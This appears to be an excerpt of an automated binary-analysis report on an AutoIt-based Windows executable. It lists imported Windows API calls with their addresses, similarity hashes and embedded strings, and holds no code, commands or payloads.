                          Similarity
                          • API ID: __wcsnicmp
                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                          • API String ID: 1038674560-2734436370
                          • Opcode ID: ed84cadcf84f2d7a6e3fd5d79b2d241c6f6fdf83c9a1fb2dad29031b049ba7ca
                          • Instruction ID: f68a95437f6dbb24b8102ffeba2da14142726b82668cf6d3f0396cee4a36e8f2
                          • Opcode Fuzzy Hash: ed84cadcf84f2d7a6e3fd5d79b2d241c6f6fdf83c9a1fb2dad29031b049ba7ca
                          • Instruction Fuzzy Hash: 832149721042617AC230F7759C06EFB73E89F75304F144427FA9687291EB91AB82E2A2
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CD180D
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CD1833
                          • SysAllocString.OLEAUT32(00000000), ref: 00CD1836
                          • SysAllocString.OLEAUT32 ref: 00CD1857
                          • SysFreeString.OLEAUT32 ref: 00CD1860
                          • StringFromGUID2.COMBASE(?,?,00000028), ref: 00CD187A
                          • SysAllocString.OLEAUT32(?), ref: 00CD1888
                          Similarity
                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                          • String ID:
                          • API String ID: 3761583154-0
                          • Opcode ID: ce55f2d096a38d93f8241f9a2c16a0395edea0af276b2470d2feac6b9cfca742
                          • Instruction ID: e50c3ad660a7ba932491ae646abfac3b66243138086333b5d605bce2228cf164
                          • Opcode Fuzzy Hash: ce55f2d096a38d93f8241f9a2c16a0395edea0af276b2470d2feac6b9cfca742
                          • Instruction Fuzzy Hash: 76216075600204BF9B10DBE9DC88DAE77ECEB09360B458126FA15DB3A4DB74ED819B60
                          APIs
                            • Part of subcall function 00CAC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00CAC657
                            • Part of subcall function 00CAC619: GetStockObject.GDI32(00000011), ref: 00CAC66B
                            • Part of subcall function 00CAC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00CAC675
                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00CFA13B
                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00CFA148
                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00CFA153
                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00CFA162
                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00CFA16E
                          Strings
                          Similarity
                          • API ID: MessageSend$CreateObjectStockWindow
                          • String ID: Msctls_Progress32
                          APIs
                          • __getptd_noexit.LIBCMT ref: 00CB4C3E
                            • Part of subcall function 00CB86B5: GetLastError.KERNEL32(?,00CB0127,00CB88A3,00CB4673,?,?,00CB0127,?,00C9125D,00000058,?,?), ref: 00CB86B7
                            • Part of subcall function 00CB86B5: __calloc_crt.LIBCMT ref: 00CB86D8
                            • Part of subcall function 00CB86B5: GetCurrentThreadId.KERNEL32 ref: 00CB8701
                            • Part of subcall function 00CB86B5: SetLastError.KERNEL32(00000000,00CB0127,00CB88A3,00CB4673,?,?,00CB0127,?,00C9125D,00000058,?,?), ref: 00CB8719
                          • CloseHandle.KERNEL32(?,?,00CB4C1D), ref: 00CB4C52
                          • __freeptd.LIBCMT ref: 00CB4C59
                          • RtlExitUserThread.NTDLL(00000000,?,00CB4C1D), ref: 00CB4C61
                          • GetLastError.KERNEL32(?,?,00CB4C1D), ref: 00CB4C91
                          • RtlExitUserThread.NTDLL(00000000,?,?,00CB4C1D), ref: 00CB4C98
                          • __freefls@4.LIBCMT ref: 00CB4CB4
                          Similarity
                          • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                          • String ID:
                          APIs
                          • GetClientRect.USER32(?,?), ref: 00CAC6C0
                          • GetWindowRect.USER32(?,?), ref: 00CAC701
                          • ScreenToClient.USER32(?,?), ref: 00CAC729
                          • GetClientRect.USER32(?,?), ref: 00CAC856
                          • GetWindowRect.USER32(?,?), ref: 00CAC86F
                          Similarity
                          • API ID: Rect$Client$Window$Screen
                          • String ID:
                          APIs
                          Similarity
                          • API ID: _memmove$__itow__swprintf
                          • String ID:
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00CF1B09
                          • Process32FirstW.KERNEL32(00000000,?), ref: 00CF1B17
                          • __wsplitpath.LIBCMT ref: 00CF1B45
                            • Part of subcall function 00CB297D: __wsplitpath_helper.LIBCMT ref: 00CB29BD
                          • _wcscat.LIBCMT ref: 00CF1B5A
                          • Process32NextW.KERNEL32(00000000,?), ref: 00CF1BD0
                          • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00CF1BE2
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                          • String ID:
                          APIs
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                            • Part of subcall function 00CF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF2AA6,?,?), ref: 00CF3B0E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF2FA0
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CF2FE0
                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00CF3003
                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00CF302C
                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CF306F
                          • RegCloseKey.ADVAPI32(00000000), ref: 00CF307C
                          Similarity
                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                          • String ID:
                          APIs
                          Similarity
                          • API ID: _wcscpy$_wcscat
                          • String ID:
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00CD2AF6
                          • VariantClear.OLEAUT32(00000013), ref: 00CD2B68
                          • VariantClear.OLEAUT32(00000000), ref: 00CD2BC3
                          • _memmove.LIBCMT ref: 00CD2BED
                          • VariantClear.OLEAUT32(?), ref: 00CD2C3A
                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00CD2C68
                          Similarity
                          • API ID: Variant$Clear$ChangeInitType_memmove
                          • String ID:
                          APIs
                          • GetMenu.USER32(?), ref: 00CF833D
                          • GetMenuItemCount.USER32(00000000), ref: 00CF8374
                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00CF839C
                          • GetMenuItemID.USER32(?,?), ref: 00CF840B
                          • GetSubMenu.USER32(?,?), ref: 00CF8419
                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 00CF846A
                          Similarity
                          • API ID: Menu$Item$CountMessagePostString
                          • String ID:
                          APIs
                          • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00CE9409
                          • WSAGetLastError.WS2_32(00000000), ref: 00CE9416
                          • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00CE943A
                          • _strlen.LIBCMT ref: 00CE9484
                          • _memmove.LIBCMT ref: 00CE94CA
                          • WSAGetLastError.WS2_32(00000000), ref: 00CE94F7
                          Similarity
                          • API ID: ErrorLast$_memmove_strlenselect
                          • String ID:
                          APIs
                          • _memset.LIBCMT ref: 00CD552E
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CD5579
                          • IsMenu.USER32(00000000), ref: 00CD5599
                          • CreatePopupMenu.USER32 ref: 00CD55CD
                          • GetMenuItemCount.USER32(000000FF), ref: 00CD562B
                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00CD565C
                          Similarity
                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                          • String ID:
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 00CAB1C1
                          • GetWindowRect.USER32(?,?), ref: 00CAB225
                          • ScreenToClient.USER32(?,?), ref: 00CAB242
                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00CAB253
                          • EndPaint.USER32(?,?), ref: 00CAB29D
                          Similarity
                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                          • String ID:
                          APIs
                          • ShowWindow.USER32(00D51810,00000000,?,?,00D51810,00D51810,?,00D0E2D6), ref: 00CFE21B
                          • EnableWindow.USER32(?,00000000), ref: 00CFE23F
                          • ShowWindow.USER32(00D51810,00000000,?,?,00D51810,00D51810,?,00D0E2D6), ref: 00CFE29F
                          • ShowWindow.USER32(?,00000004,?,?,00D51810,00D51810,?,00D0E2D6), ref: 00CFE2B1
                          • EnableWindow.USER32(?,00000001), ref: 00CFE2D5
                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00CFE2F8
                          Similarity
                          • API ID: Window$Show$Enable$MessageSend
                          • String ID:
                          APIs
                            • Part of subcall function 00C984A6: __swprintf.LIBCMT ref: 00C984E5
                            • Part of subcall function 00C984A6: __itow.LIBCMT ref: 00C98519
                            • Part of subcall function 00C93BCF: _wcscpy.LIBCMT ref: 00C93BF2
                          • _wcstok.LIBCMT ref: 00CE1D6E
                          • _wcscpy.LIBCMT ref: 00CE1DFD
                          • _memset.LIBCMT ref: 00CE1E30
                          Strings
                          Similarity
                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                          • String ID: X
                          APIs
                            • Part of subcall function 00CAB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00CAB5EB
                            • Part of subcall function 00CAB58B: SelectObject.GDI32(?,00000000), ref: 00CAB5FA
                            • Part of subcall function 00CAB58B: BeginPath.GDI32(?), ref: 00CAB611
                            • Part of subcall function 00CAB58B: SelectObject.GDI32(?,00000000), ref: 00CAB63B
                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00CFE9F2
                          • LineTo.GDI32(00000000,00000003,?), ref: 00CFEA06
                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00CFEA14
                          • LineTo.GDI32(00000000,00000000,?), ref: 00CFEA24
                          • EndPath.GDI32(00000000), ref: 00CFEA34
                          • StrokePath.GDI32(00000000), ref: 00CFEA44
                          Similarity
                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                          • String ID:
                          • API String ID: 43455801-0
                          • Opcode ID: da918347196c442ace2cad2d33646288dd58f5939b83a5907468ca983bca5046
                          • Instruction ID: 8912d28aa2b442c7af593d500225aa0e76712ca6fd8cb4d9cdd35f3b3cbb1f84
                          • Opcode Fuzzy Hash: da918347196c442ace2cad2d33646288dd58f5939b83a5907468ca983bca5046
                          • Instruction Fuzzy Hash: E411B77600024DBFDB129F90DC88EEA7FADEB08355F048012FE1999261D7719E569BA0
                          APIs
                          • GetDC.USER32(00000000), ref: 00CCEFB6
                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00CCEFC7
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CCEFCE
                          • ReleaseDC.USER32(00000000,00000000), ref: 00CCEFD6
                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00CCEFED
                          • MulDiv.KERNEL32(000009EC,?,?), ref: 00CCEFFF
                            • Part of subcall function 00CCA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00CCA79D,00000000,00000000,?,00CCAB73), ref: 00CCB2CA
                          Similarity
                          • API ID: CapsDevice$ExceptionRaiseRelease
                          • String ID:
                          • API String ID: 603618608-0
                          • Opcode ID: fe72ffddf23d127884df4aa598eabe2bbb2ea049aae877438472be651d3c0fe6
                          • Instruction ID: 709b812fe3ca3658ea6fc04a6845eb3e8193e1fa8e88af4a68006e4e8bc471c2
                          • Opcode Fuzzy Hash: fe72ffddf23d127884df4aa598eabe2bbb2ea049aae877438472be651d3c0fe6
                          • Instruction Fuzzy Hash: CD012175A00319BBEB109BE5DC49B5EBFB9EB49751F10806AFA04EB390DA709D018B61
                          APIs
                          • __init_pointers.LIBCMT ref: 00CB87D7
                            • Part of subcall function 00CB1E5A: __initp_misc_winsig.LIBCMT ref: 00CB1E7E
                            • Part of subcall function 00CB1E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00CB8BE1
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00CB8BF5
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00CB8C08
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00CB8C1B
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00CB8C2E
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00CB8C41
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00CB8C54
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00CB8C67
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00CB8C7A
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00CB8C8D
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00CB8CA0
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00CB8CB3
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00CB8CC6
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00CB8CD9
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00CB8CEC
                            • Part of subcall function 00CB1E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00CB8CFF
                          • __mtinitlocks.LIBCMT ref: 00CB87DC
                            • Part of subcall function 00CB8AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(00D4AC68,00000FA0,?,?,00CB87E1,00CB6AFA,00D467D8,00000014), ref: 00CB8AD1
                          • __mtterm.LIBCMT ref: 00CB87E5
                            • Part of subcall function 00CB884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00CB89CF
                            • Part of subcall function 00CB884D: _free.LIBCMT ref: 00CB89D6
                            • Part of subcall function 00CB884D: RtlDeleteCriticalSection.NTDLL(00D4AC68), ref: 00CB89F8
                          • __calloc_crt.LIBCMT ref: 00CB880A
                          • GetCurrentThreadId.KERNEL32 ref: 00CB8833
                          Similarity
                          • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                          • String ID:
                          • API String ID: 2942034483-0
                          • Opcode ID: 721cf8be8b6ba7035fb4970838e922dd23a4261ff849df6da2bf477b001f34c8
                          • Instruction ID: 674c5598878ac8947329f42b6b06232c918fce98ff8e50ff9ef170ee4321ad69
                          • Opcode Fuzzy Hash: 721cf8be8b6ba7035fb4970838e922dd23a4261ff849df6da2bf477b001f34c8
                          • Instruction Fuzzy Hash: B3F090321597515BF6247B787C07ACA27CC8F02734F640A2AF464D60D2FF118849E1B0
                          Similarity
                          • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                          • String ID:
                          • API String ID: 1423608774-0
                          • Opcode ID: 622b4e766e13b249df92d1a2ced81910d5488b8cb214171b7ff8afc42737004f
                          • Instruction ID: f173d303c8321333ea6436ae213d9a70b55056601348dca70b90c73990130e09
                          • Opcode Fuzzy Hash: 622b4e766e13b249df92d1a2ced81910d5488b8cb214171b7ff8afc42737004f
                          • Instruction Fuzzy Hash: 45016D32541311BBD7152B58ED48DEB77ABEF89702B00452AF613D22B1CFB4E902DA61
                          APIs
                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C91898
                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C918A0
                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C918AB
                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C918B6
                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C918BE
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C918C6
                          Similarity
                          • API ID: Virtual
                          • String ID:
                          • API String ID: 4278518827-0
                          • Opcode ID: 1f721027774e1fabb197eebc409e9eadb74b30145f4c078d6ff47186ff3866cc
                          • Instruction ID: 9ac0fd0127f5acc93e53e51cdcad59a7f5bf961effd719f1b96946563fe2673f
                          • Opcode Fuzzy Hash: 1f721027774e1fabb197eebc409e9eadb74b30145f4c078d6ff47186ff3866cc
                          • Instruction Fuzzy Hash: E00144B0902B5ABDE3008F6A8C85A52FEA8FF19354F04411BA15C87A42C7B5A864CBE5
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00CD8504
                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00CD851A
                          • GetWindowThreadProcessId.USER32(?,?), ref: 00CD8529
                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CD8538
                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CD8542
                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CD8549
                          Similarity
                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                          • String ID:
                          • API String ID: 839392675-0
                          • Opcode ID: c5729c212fece3b80963a1ab7e4b4857f822a0b3a9e7ed383618d36404bb3379
                          • Instruction ID: fe9a8ea2ec1939b2063cb18238869b3b32b9e1f616bdba145d70e2b1eded81ef
                          • Opcode Fuzzy Hash: c5729c212fece3b80963a1ab7e4b4857f822a0b3a9e7ed383618d36404bb3379
                          • Instruction Fuzzy Hash: 27F09A32240258BBE7201B629C0EEEF3B7DDFC6B11F004018FA05D1250EBA02A42C6B4
                          APIs
                          • InterlockedExchange.KERNEL32(?,?), ref: 00CDA330
                          • RtlEnterCriticalSection.NTDLL(?), ref: 00CDA341
                          • TerminateThread.KERNEL32(?,000001F6,?,?,?,00D066D3,?,?,?,?,?,00C9E681), ref: 00CDA34E
                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00D066D3,?,?,?,?,?,00C9E681), ref: 00CDA35B
                            • Part of subcall function 00CD9CCE: CloseHandle.KERNEL32(?,?,00CDA368,?,?,?,00D066D3,?,?,?,?,?,00C9E681), ref: 00CD9CD8
                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CDA36E
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00CDA375
                          Similarity
                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                          • String ID:
                          • API String ID: 3495660284-0
                          • Opcode ID: 756c8ae00e64400a58fad6f72fb265f330fe03d4308ea9e2df54d99303e3ece8
                          • Instruction ID: c5ec6a3d4493ddcc2372147766498c11e11db1acf4caec668a04014027561659
                          • Opcode Fuzzy Hash: 756c8ae00e64400a58fad6f72fb265f330fe03d4308ea9e2df54d99303e3ece8
                          • Instruction Fuzzy Hash: C5F05832141311BBD3112B68ED88EDB7B7BEF89302B004522F212E22B1CFB59942DB61
                          APIs
                            • Part of subcall function 00CB010A: std::exception::exception.LIBCMT ref: 00CB013E
                            • Part of subcall function 00CB010A: __CxxThrowException@8.LIBCMT ref: 00CB0153
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                            • Part of subcall function 00C9BBD9: _memmove.LIBCMT ref: 00C9BC33
                          • __swprintf.LIBCMT ref: 00CAD98F
                          Strings
                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00CAD832
                          Similarity
                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                          • API String ID: 1943609520-557222456
                          • Opcode ID: 36825c6191d7a0ad9380e6cfa0b8fa9d3f8f9cc34430466ca086e4504ef2bdb4
                          • Instruction ID: 378a6aae5131ff90737cd908f6914d204180e7a1b2ad5869e044e1dc9ea4b488
                          • Opcode Fuzzy Hash: 36825c6191d7a0ad9380e6cfa0b8fa9d3f8f9cc34430466ca086e4504ef2bdb4
                          • Instruction Fuzzy Hash: 82918D311183029FCB14EF64C889DAFB7A5EF85704F04495EF49A972A1DB30EE04DB66
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00CEB4A8
                          • CharUpperBuffW.USER32(?,?), ref: 00CEB5B7
                          • VariantClear.OLEAUT32(?), ref: 00CEB73A
                            • Part of subcall function 00CDA6F6: VariantInit.OLEAUT32(00000000), ref: 00CDA736
                            • Part of subcall function 00CDA6F6: VariantCopy.OLEAUT32(?,?), ref: 00CDA73F
                            • Part of subcall function 00CDA6F6: VariantClear.OLEAUT32(?), ref: 00CDA74B
                          Similarity
                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                          • API String ID: 4237274167-1221869570
                          • Opcode ID: a1104020bcddc3aadcc68a79f76d61917f6b20f9ef44c481762adad26513880b
                          • Instruction ID: aab2a752f411f5c994ae40a8a1489b226f018b7098186ac578e04d1c0c4316ec
                          • Opcode Fuzzy Hash: a1104020bcddc3aadcc68a79f76d61917f6b20f9ef44c481762adad26513880b
                          • Instruction Fuzzy Hash: 15918A706083419FCB14DF29C48496BB7E8AF89700F14486EF89A9B362DB30ED45DB52
                          APIs
                          • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00CD10B8
                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00CD10EE
                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00CD10FF
                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00CD1181
                          Similarity
                          • API ID: ErrorMode$AddressCreateInstanceProc
                          • String ID: DllGetClassObject
                          • API String ID: 753597075-1075368562
                          • Opcode ID: e138d9db11f9aeaf6b9fa4a5383a1cdfb1413f3ff14db3bc439f145daeb08a02
                          • Instruction ID: 9e887b069f4b929fefed8cf470d75b56637e061289fb5850d49b5c7896e25cbe
                          • Opcode Fuzzy Hash: e138d9db11f9aeaf6b9fa4a5383a1cdfb1413f3ff14db3bc439f145daeb08a02
                          • Instruction Fuzzy Hash: 8F412CB1600205FFDB15CF55C884A9A7BB9EF44354F1880AAEE09DF305D7B1DA84CBA0
                          APIs
                          • _memset.LIBCMT ref: 00CD5A93
                          • GetMenuItemInfoW.USER32 ref: 00CD5AAF
                          • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00CD5AF5
                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00D518F0,00000000), ref: 00CD5B3E
                          Similarity
                          • API ID: Menu$Delete$InfoItem_memset
                          • String ID: 0
                          • API String ID: 1173514356-4108050209
                          • Opcode ID: e61c34dd7a3b2898a9f577b711c19fa8d852ff8a0143280418e18086b2972910
                          • Instruction ID: 4360eb0fab613f03d9a5e80a9946a47806d02ce501f19680c7ae6c52447cad77
                          • Opcode Fuzzy Hash: e61c34dd7a3b2898a9f577b711c19fa8d852ff8a0143280418e18086b2972910
                          • Instruction Fuzzy Hash: DE418171204701AFDB10DF24C884B6ABBE5AF89714F14461FFAA99B3D1D770E901CB62
                          APIs
                          • CharLowerBuffW.USER32(?,?,?,?), ref: 00CF0478
                            • Part of subcall function 00C97F40: _memmove.LIBCMT ref: 00C97F8F
                            • Part of subcall function 00C9A2FB: _memmove.LIBCMT ref: 00C9A33D
                          Similarity
                          • API ID: _memmove$BuffCharLower
                          • String ID: cdecl$none$stdcall$winapi
                          • API String ID: 2411302734-567219261
                          • Opcode ID: 73ca299211529cb9d1f948570bd541d3a561342157e976daf75a9e6a2f591740
                          • Instruction ID: d981ce56675067512265e8ff4ce0dce2423ebede5673238574361afea51e55c2
                          • Opcode Fuzzy Hash: 73ca299211529cb9d1f948570bd541d3a561342157e976daf75a9e6a2f591740
                          • Instruction Fuzzy Hash: F031B43450061AAFCF00DF98C841AFEB3B5FF05750B208A29E562A72D2DB71EA05DF91
                          APIs
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00CCC684
                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00CCC697
                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00CCC6C7
                            • Part of subcall function 00C97E53: _memmove.LIBCMT ref: 00C97EB9
                          Strings
                          Similarity
                          • API ID: MessageSend$_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 458670788-1403004172
                          APIs
                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CE4A60
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CE4A86
                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00CE4AB6
                          • InternetCloseHandle.WININET(00000000), ref: 00CE4AFD
                            • Part of subcall function 00CE56A9: GetLastError.KERNEL32(?,?,00CE4A2B,00000000,00000000,00000001), ref: 00CE56BE
                          Strings
                          Similarity
                          • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                          • String ID:
                          • API String ID: 1951874230-3916222277
                          APIs
                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00D0454E
                            • Part of subcall function 00C97E53: _memmove.LIBCMT ref: 00C97EB9
                          • _memset.LIBCMT ref: 00C93965
                          • _wcscpy.LIBCMT ref: 00C939B5
                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C939C6
                          Strings
                          Similarity
                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                          • String ID: Line:
                          • API String ID: 3942752672-1585850449
                          APIs
                            • Part of subcall function 00CAC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00CAC657
                            • Part of subcall function 00CAC619: GetStockObject.GDI32(00000011), ref: 00CAC66B
                            • Part of subcall function 00CAC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00CAC675
                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00CF8F69
                          • LoadLibraryW.KERNEL32(?), ref: 00CF8F70
                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00CF8F85
                          • DestroyWindow.USER32(?), ref: 00CF8F8D
                          Strings
                          Similarity
                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                          • String ID: SysAnimate32
                          • API String ID: 4146253029-1011021900
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00CDE392
                          • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 00CDE3E6
                          • __swprintf.LIBCMT ref: 00CDE3FF
                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,00D2DBF0), ref: 00CDE43D
                          Strings
                          Similarity
                          • API ID: ErrorMode$InformationVolume__swprintf
                          • String ID: %lu
                          • API String ID: 3164766367-685833217
                          APIs
                            • Part of subcall function 00C97E53: _memmove.LIBCMT ref: 00C97EB9
                            • Part of subcall function 00CCD623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00CCD640
                            • Part of subcall function 00CCD623: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CCD653
                            • Part of subcall function 00CCD623: GetCurrentThreadId.KERNEL32 ref: 00CCD65A
                            • Part of subcall function 00CCD623: AttachThreadInput.USER32(00000000), ref: 00CCD661
                          • GetFocus.USER32 ref: 00CCD7FB
                            • Part of subcall function 00CCD66C: GetParent.USER32(?), ref: 00CCD67A
                          • GetClassNameW.USER32(?,?,00000100), ref: 00CCD844
                          • EnumChildWindows.USER32(?,00CCD8BA), ref: 00CCD86C
                          • __swprintf.LIBCMT ref: 00CCD886
                          Strings
                          Similarity
                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                          • String ID: %s%d
                          • API String ID: 1941087503-1110647743
                          APIs
                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00CF18E4
                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00CF1917
                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00CF1A3A
                          • CloseHandle.KERNEL32(?), ref: 00CF1AB0
                          Similarity
                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                          • String ID:
                          • API String ID: 2364364464-0
                          APIs
                            • Part of subcall function 00C984A6: __swprintf.LIBCMT ref: 00C984E5
                            • Part of subcall function 00C984A6: __itow.LIBCMT ref: 00C98519
                          • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00CF05DF
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00CF066E
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00CF068C
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00CF06D2
                          • FreeLibrary.KERNEL32(00000000,00000004), ref: 00CF06EC
